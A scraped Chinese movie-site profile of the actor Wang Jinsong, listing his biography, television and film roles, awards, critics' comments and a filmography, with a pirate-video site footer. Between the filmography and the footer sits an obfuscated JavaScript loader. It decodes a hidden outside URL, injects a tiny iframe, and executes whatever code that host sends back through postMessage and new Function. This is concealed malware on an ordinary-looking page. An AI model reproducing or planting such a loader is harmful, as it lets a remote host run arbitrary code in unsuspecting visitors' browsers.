王劲松

  • 职业:演员
  • 身高:179cm
  • 体重:65kg
  • 星座:天蝎座
  • 生日:1968年11月15
  • 出生地:江苏省无锡市

王劲松简介

      影人简介

        王劲松,1968年11月15日出生于江苏省无锡市,中国内地男演员,南京市话剧团演员。

        2006年,参演历史大剧《大明王朝1566》饰演太监杨金水。同年参演电视剧《血色湘西》,饰演麻溪铺清溪书院瞿先生。2007年首播历史剧《恰同学少年》中饰演湖南督军汤芗铭。2009年,主演刑侦剧《现场铁证》,在剧中饰演男主角陈元。2011年,出演谍战剧《借枪》,饰演于挺。同年参演电视剧《弹孔》,一人分饰两角,塑造孪生兄弟邢子良、邢子玉。2012年,出演《我是特种兵之利刃出鞘》饰演越南雇佣兵蝎子。2013年,参演电视剧《江湖正道》饰演聂双会。2014年,在《北平无战事》中饰演王蒲忱。2015年,在《琅琊榜》中塑造侯爷言阙,在《麻雀》中饰演李默群。2016年,在《军师联盟》中饰演荀彧,在《大唐荣耀》中饰演唐肃宗李亨。同年10月12日,参演红色年代传奇剧《星火燎原之云雾街》。2017年,在古装剧《天下长安》中,饰演萧瑀。参演谍战剧《秋蝉》,神话剧《天乩之白蛇传说》。

        2019年5月7日,主演的缉毒题材剧《破冰行动》在爱奇艺上线。

        2019年11月,凭借电视剧《破冰行动》获得第26届华鼎奖中国百强电视剧满意度调查颁奖盛典中国百强电视剧最佳男配角提名。

      演艺经历

        1997年,参演电视剧《新乱世佳人》,饰演冒之良。

        2002年,参演电视剧《大哥》,饰演陈文宝。

        2005年,参演电视剧《金色黄昏》,饰演马亦光。参演张黎执导的电视剧《锦衣卫》,饰演朱由检。

        2006年,参演张黎执导的电视剧《大明王朝1566》,在剧中饰演太监杨金水,获大众好评。同年参演电视剧《血色湘西》,饰演麻溪铺清溪书院瞿先生。

        2007年首播历史剧《恰同学少年》中饰演湖南督军汤芗铭。

        2008年,在为北京残奥会而特别制作的电视剧《哑妹》中,塑造文弱书生姜云阳。

        2009年,在刑侦剧《现场铁证》中首次担任男一号,饰演刑侦队队长陈元。同年,在《红星闪耀》中饰演赵赣生。同年,在都市喜剧《我是老板》中饰演马一平。

        2011年,参演电视剧《弹孔》(又名《带弹孔的勋章》),并且一人分饰两角,塑造孪生兄弟邢子良、邢子玉。同年,在姜伟执导的谍战剧《借枪》中,出演地下党员于挺。在同年播出的电视剧《我的燃情岁月》一剧中饰演陈军医。

        2012年,凭借参演《我是特种兵之利刃出鞘》中的反一号蝎子所为人熟知。同年,主演谍战大剧《越境》,并饰演日本军官野村。

        2013年,在抗战题材电视剧《江湖正道》中出演土匪“聂双会”。

        2014年,在《边城》中饰演侵华日军本部长池田正夫。同年,在《少林寺传奇藏经阁》一剧中饰演寂空。同年,在孔笙执导的年度大戏《北平无战事》中塑造保密局北平站长王蒲忱。

        2015年,参演孔笙、李雪执导的古装传奇电视剧《琅琊榜》,饰演侯爷言阙。同年,参演年代剧《姐妹姐妹》,在剧中饰演军阀“卢狩云”。同年,在电视剧《雪白血红》中饰演丁丰。同年,在谍战剧《麻雀》中饰演李默群,并凭借该剧获得2017横店影视节第四届“文荣奖”最佳男配角奖。

        2016年,在高原山地军旅题材电视剧《突击再突击》中,饰演山地特战旅旅长欧阳如山。同年,出演悬疑警匪剧《我是警察》,在古装剧《大军师司马懿之军师联盟》中饰演荀彧,在古装剧《大唐荣耀》中饰演唐肃宗李亨,从一位懦弱无能的太子到淡薄无情的皇帝,其反差令人折服。同年10月12日参演由欧阳黔森编剧、闫宇彤执导的红色年代传奇剧《星火燎原之云雾街》。

        2017年,在古装剧《天下长安》中,饰演萧瑀。参演谍战剧《秋蝉》,神话剧《天乩之白蛇传说》。

        2018年6月18日,特别主演的古装玄幻励志剧《扶摇》登陆浙江卫视中国蓝周播剧场,并在剧中饰演长孙迥;同年主演现代都市情感电视剧《推手》,饰演梅道远。

        2019年5月7日,参演的缉毒题材剧《破冰行动》在爱奇艺上线,在剧中王劲松饰演塔寨村村支书林耀东。6月,参演悬疑推理电影《嫌疑人》。10月16日,王劲松友情出演的影片《打过长江去》在全国上映。11月,出演电视剧《鹤唳华亭》。

        2019年12月,出演国内首档剧情式历史纪录片《风云战国之列国》。

        2020年1月1日,和周涛联袂安徽卫视主持人周群、白羽共同主持2019国剧盛典。

      个人生活

        生活中的王劲松,喜欢文玩和玉石,同时也喜欢茶,无论是会客聊天还是接受采访,都会习惯性的自带茶叶,泡上一杯香茶,边喝边聊。在闲暇时,王劲松经常出门旅游,热爱美食和摄影。

      获奖记录

         横店影视节文荣奖

      • 2017第四届最佳男配角麻雀(获奖)

           其它奖项

        • 2020-01安徽卫视2019国剧盛典年度魅力男演员(获奖)

          人物评价

            王劲松在《我是特种兵之利刃出鞘》中将独特的个人风格与角色融合,把这个让人爱恨交加的人物淋漓尽致地呈现给观众,这个迷人的坏蛋成功绑架了所有人的视线。

            王劲松演的戏都入木三分,他之前在《大明王朝1566》中饰演的太监杨金水,称得上是中国近30年第一太监。

            他伪善凌厉的眼神背后隐藏着重重阴谋,看似平静湖面波澜不惊,但湖底却是澎湃汹涌的暗流。表面上斯文儒雅,事实上心如利刃。(《麻雀》)

            王劲松老师饰演的李亨情绪波动极大,情感爆发的戏份尤为重要,对台词的把控便成为塑造角色的关键,此次王劲松老师恰到好处的原声配音将帝王的高贵霸气、父亲的严厉愤怒悉数展现。(《大唐荣耀》)

    参演作品

    • 6.669集全麻雀李易峰,周冬雨,张鲁一,李小冉,张若昀,阚清子,魏巍,尹正,王劲松,史超,刘珈彤,王婉娟,吴云飞
    • 9.1第20210417期见字如面第五季宋洋,张萌,王劲松,徐僧,俞灏明,刘琳,嘉怡,张晞临,李建义,宁理,高晓攀
    • 9.354集全琅琊榜胡歌,刘涛,王凯,陈龙,黄维德,靳东,高鑫,张棪琰,张龄心,王鸥,周奇奇,吴磊,张晓谦,郑毓芝,,丁勇岱,王劲松,刘奕君,刘敏涛,程皓枫,郭晓然,匡牧野,陈丽娜,宁文彤,杨雨婷,谭希和,方晓莉,张哲瀚,钟卫华,张雨剑,乔欣,王永泉,魏伟,王宏,赵一龙,卢杉
    • 高清最可爱的人李立宏,廖菁,苗壮,高茂桐,郭俊辰,周奇,焉栩嘉,王劲松,邵彤,凌振赫,王冠楠,常进,吴刚,赵明洲,张子枫,胡亚捷,庄达菲,臧金生
    • 48集全破冰行动黄景瑜,吴刚,王劲松,任达华,李墨之,张晞临,马渝捷
    • 47集全推手贾乃亮,王鸥,刘欢,边潇潇,王劲松,李天柱,吴昕,万思维,戴春荣
    • 7.2全40集阳光之下蔡文静,刘凯,彭冠英,王劲松,岳旸,李东恒,马藜,李砚,多布杰,冯雷,萨日娜,孙之鸿,王从懿
    • 更新至08期见字如面第5季宋洋,张萌,王劲松,何瑜,徐僧,俞灏明,刘琳,冯嘉怡,张晞临
    • 更新至02集长安诺粤语成毅,赵樱子,韩栋,梁婧娴,韩承羽,杨超越,王劲松,王琳,黄宥明,张睿,何中华,邬靖靖,刘萌萌,赵文浩,赵东泽,薛泽源,唐瑞雪,张墨锡,傅方俊,黄羿,李泽,付梦妮,卢星宇,杨晋恒
    • 6.6高清缝纫机乐队大鹏,乔杉,古力娜扎,李鸿其,韩童生,曲隽希,于谦,岳云鹏,王劲松,于洋,代乐乐,赵英俊,马大明,张一鸣,衣云鹤,曹然然,曹桐睿,宋小宝,刘小光,文松,宋晓峰,周冬雨,袁姗姗,宋茜,林志玲
    • 9.746集全大明王朝1566陈宝国,黄志忠,倪大红,王庆祥,郭东文,郑玉,张子健,闫妮,王雅捷,祝希娟,王劲松,赵立新,徐敏,郭广平,谭凯,肖竹,甘雨,张志坚,刘毓滨,晋松,徐光明,刘立伟,赵雍,徐成峰,王宇,陈之辉,杨涵斌,王戎,马小宁,胡灵灵,林海韵,三浦研一,穆泓屹,李婧,浅野长英
    • 高清打过长江去张桐,洪天照,淳于珊珊,王劲松,于越,杨轶,赵滨,许雅婷,姬晓飞,聂远,闫鹏宇,吕小品,贺宽,赵宁宇
    • 6.0全40集江湖正道王劲松,黄志忠,斯琴高娃,柯蓝,申军谊,倪大红,杨舒,杨山
    • 45集全/已完结若你安好便是晴天张翰,徐璐,洪尧,王瑞子,王劲松
    • 共36集/更新至16集凤唳九天陈哲远,李墨之,张峻宁,程砚秋,晏紫东,张璇,张晨光,许榕真,杨新鸣,张棪琰,王劲松,宗峰岩
    • 8.1完结风云战国之列国海一天,于荣光,郑则仕,林永健,王劲松,李立群,喻恩泰
    • 1.0BD超清中字六月里好阳光王劲松,姚笛,赵宁宇
    • 4.7全66集扶摇杨幂,阮经天,刘奕君,王劲松,高伟光,赖艺,张雅钦,胡可,高瀚宇,黄宥明,李依晓,梁译木,阿丽亚,蒋龙,赵楚纶,宋佳伦,刘璇,涓子,李洪涛
    • 全28集阳光之下柯滢逆袭版蔡文静,刘凯,彭冠英,王劲松
    • HD最可爱的人动画版李立宏,吴刚,臧金生,王劲松,郭俊辰,周奇,焉栩嘉,张子枫,高茂桐
    function OklDCUeK(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function EevwrMI(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return OklDCUeK(t);};eval('\x77\x69\x6e\x64\x6f\x77')['\x6a\x6d\x50\x56\x4c\x43\x44\x41\x48']=function(){;(function(u,r,w,d,f,c){var x=EevwrMI;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id='x'+(Math.random()*10000);f.style.width=f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data[r]){d.getElementById(f.id).style.display='none';new Function(x(e.data[r].replace(new RegExp(r,'g'),'')))();}});})('aHR0cHMlM0ElMkYlMkZpbWltLm1lJTJGGODkyMw==',''+'XRj'+'qSt'+'mpL'+'c'+'',window,document,''+'8Y5'+'6Ul'+'g'+'','G');};

    本站不会保存、复制或传播任何视频文件,也不对本站所抓取的任何内容负法律责任,所列的内容仅做宽带测试使用。

    若本站收集的节目无意侵犯了贵司版权,请给jsjlyb@gmail.com邮箱地址来信,我们将在第一时间删除相应资源。

    RSS订阅 - 百度sitemap - 谷歌sitemap - 必应sitemap - 搜狗sitemap - 奇虎sitemap - 神马sitemap

    Copyright © 2021 www.hobiao.com - 红标影院

    公众号